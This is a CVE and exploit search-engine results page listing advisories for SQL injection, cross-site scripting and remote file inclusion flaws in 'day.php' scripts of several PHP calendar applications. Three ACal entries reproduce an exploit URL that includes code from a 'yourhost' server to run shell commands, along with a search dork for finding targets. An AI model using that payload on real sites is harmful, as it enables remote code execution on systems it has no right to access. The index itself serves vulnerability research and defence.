CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

14 matches found

Positive Technologies•added 2025/02/24 12:0 a.m.•2 views

PT-2025-7773 · Slims · Slims

Name of the Vulnerable Software and Affected Versions: SLIMS version 9.6.1 Description: The issue allows a remote attacker to escalate privileges via the month parameter in the visitor report day.php component. This is a result of SQL injection in the affected software. Recommendations: For SLIMS...

7.2CVSS7.7AI score0.01326EPSS

Exploits1References7

seebug.org•added 2014/07/01 12:0 a.m.•10 views

Horde Multiple Product - day.php timestamp Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/29365/info Horde Kronolith is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•12 views

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

No description provided by source. $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:Login to Calendar $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls...

7.1AI score

Exploits0

exploitpack•added 2010/03/22 12:0 a.m.•15 views

PHPKIT 1.6.x - b-day.php Addon SQL Injection

PHPKIT 1.6.x - b-day.php Addon SQL Injection source: https://www.securityfocus.com/bid/38891/info PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...

Exploits0

Exploit DB•added 2010/03/22 12:0 a.m.•23 views

PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection

source: https://www.securityfocus.com/bid/38891/info PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, acces...

7.4AI score

Exploits0

Cvelist•added 2010/02/12 10:0 p.m.•18 views

CVE-2010-0636

Multiple cross-site scripting XSS vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to inject arbitrary web script or HTML via the 1 tab parameter to users.php and the PATHINFO to 2 day.php, 3 month.php, and 4 week.php. NOTE: some of these details are...

5.7AI score0.00285EPSS

Exploits0References4

Cvelist•added 2008/10/21 12:0 a.m.•12 views

CVE-2008-4620

SQL injection vulnerability in Meeting Room Booking System MRBS before 1.4 allows remote attackers to execute arbitrary SQL commands via the area parameter to 1 month.php, and possibly 2 day.php and 3 week.php...

8.4AI score0.00421EPSS

Exploits0References5

Cvelist•added 2008/08/10 8:0 p.m.•13 views

CVE-2008-3565

Multiple cross-site scripting XSS vulnerabilities in Meeting Room Booking System MRBS 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the area parameter to 1 day.php, 2 week.php, 3 month.php, 4 search.php, 5 report.php, and 6 help.php. NOTE: the provenance of this...

5.7AI score0.00231EPSS

Exploits1References4

Exploit DB•added 2008/08/04 12:0 a.m.•24 views

Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/30531/info MRBS Meeting Room Booking Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an...

7.4AI score

Exploits0

Cvelist•added 2008/06/19 8:0 p.m.•20 views

CVE-2008-2783

Multiple cross-site scripting XSS vulnerabilities in Horde Groupware, Groupware Webmail Edition, and Kronolith allow remote attackers to inject arbitrary web script or HTML via the timestamp parameter to 1 week.php, 2 workweek.php, and 3 day.php; and 4 the horde parameter in the PATHINFO to the...

5.7AI score0.00246EPSS

Exploits1References2

CVE•added 2006/05/09 10:0 a.m.•73 views

CVE-2006-2261

CVE-2006-2261 affects ACal 2.2.6. The embed/day.php script does not sanitize the path parameter before using it in PHP include(), enabling a remote file inclusion that can allow arbitrary PHP code execution if PHP register_globals is enabled; the exact exploit details are not provided in the docu...

7.5CVSS7.5AI score0.16413EPSS

Exploits1References6Affected Software1

Exploit DB•added 2006/05/07 12:0 a.m.•43 views

ACal 2.2.6 - 'day.php' Remote File Inclusion

$$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...

7.4AI score

Exploits0

seebug.org•added 2006/05/07 12:0 a.m.•17 views

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

No description provided by source. $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls...

7.1AI score

Exploits0

NVD•added 2005/09/14 8:3 p.m.•9 views

CVE-2005-2882

Multiple cross-site scripting XSS vulnerabilities in phpCommunityCalendar 4.0.3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the LocationID parameter to 1 thankyou.php or 2 day.php, font parameter to 3 calDaily.php, 4 calMonthly.php, 5...

4.3CVSS5.8AI score0.00565EPSS

Exploits1References5

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by